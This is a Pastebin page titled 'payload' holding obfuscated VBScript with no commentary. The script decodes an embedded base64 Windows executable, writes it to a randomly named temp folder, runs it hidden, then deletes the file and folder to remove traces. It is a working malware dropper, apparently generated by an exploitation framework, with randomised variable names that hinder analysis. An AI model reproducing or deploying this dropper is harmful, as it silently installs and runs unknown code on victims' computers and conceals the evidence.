API tools faq
paste
Advertisement
bakata

payload

bakata
Jun 20th, 2019
186
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.21 KB | None | 0 0
raw download clone embed print report
  1. Function BoONWJGZXe(AGzVJiWOZjqU)
  2. ipFknsjN = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
  3. "dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
  4. AGzVJiWOZjqU & "</B64DECODE>"
  5. Set lKNcdfDvXJRb = CreateObject("MSXML2.DOMDocument.3.0")
  6. lKNcdfDvXJRb.LoadXML(ipFknsjN)
  7. BoONWJGZXe = lKNcdfDvXJRb.selectsinglenode("B64DECODE").nodeTypedValue
  8. set lKNcdfDvXJRb = nothing
  9. End Function
  10.  
  11. Function BwsSiKzPGNo()
  12. LoXVezMRBhca = "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"
  13. Dim xkhckLXCET
  14. Set xkhckLXCET = CreateObject("Scripting.FileSystemObject")
  15. Dim QUxrgOxDZXHU
  16. Dim APdhVDDWVLyqFH
  17. Set QUxrgOxDZXHU = xkhckLXCET.GetSpecialFolder(2)
  18. APdhVDDWVLyqFH = QUxrgOxDZXHU & "\" & xkhckLXCET.GetTempName()
  19. xkhckLXCET.CreateFolder(APdhVDDWVLyqFH)
  20. mKtkqXDizKcYPn = APdhVDDWVLyqFH & "\" & "JEHXvKcqX.exe"
  21. Dim uQMDKPQLhsyq
  22. Set uQMDKPQLhsyq = CreateObject("Wscript.Shell")
  23. dgrKthMFbOjd = BoONWJGZXe(LoXVezMRBhca)
  24. Set KPeDIKma = CreateObject("ADODB.Stream")
  25. KPeDIKma.Type = 1
  26. KPeDIKma.Open
  27. KPeDIKma.Write dgrKthMFbOjd
  28. KPeDIKma.SaveToFile mKtkqXDizKcYPn, 2
  29. uQMDKPQLhsyq.run mKtkqXDizKcYPn, 0, true
  30. xkhckLXCET.DeleteFile(mKtkqXDizKcYPn)
  31. xkhckLXCET.DeleteFolder(APdhVDDWVLyqFH)
  32. End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!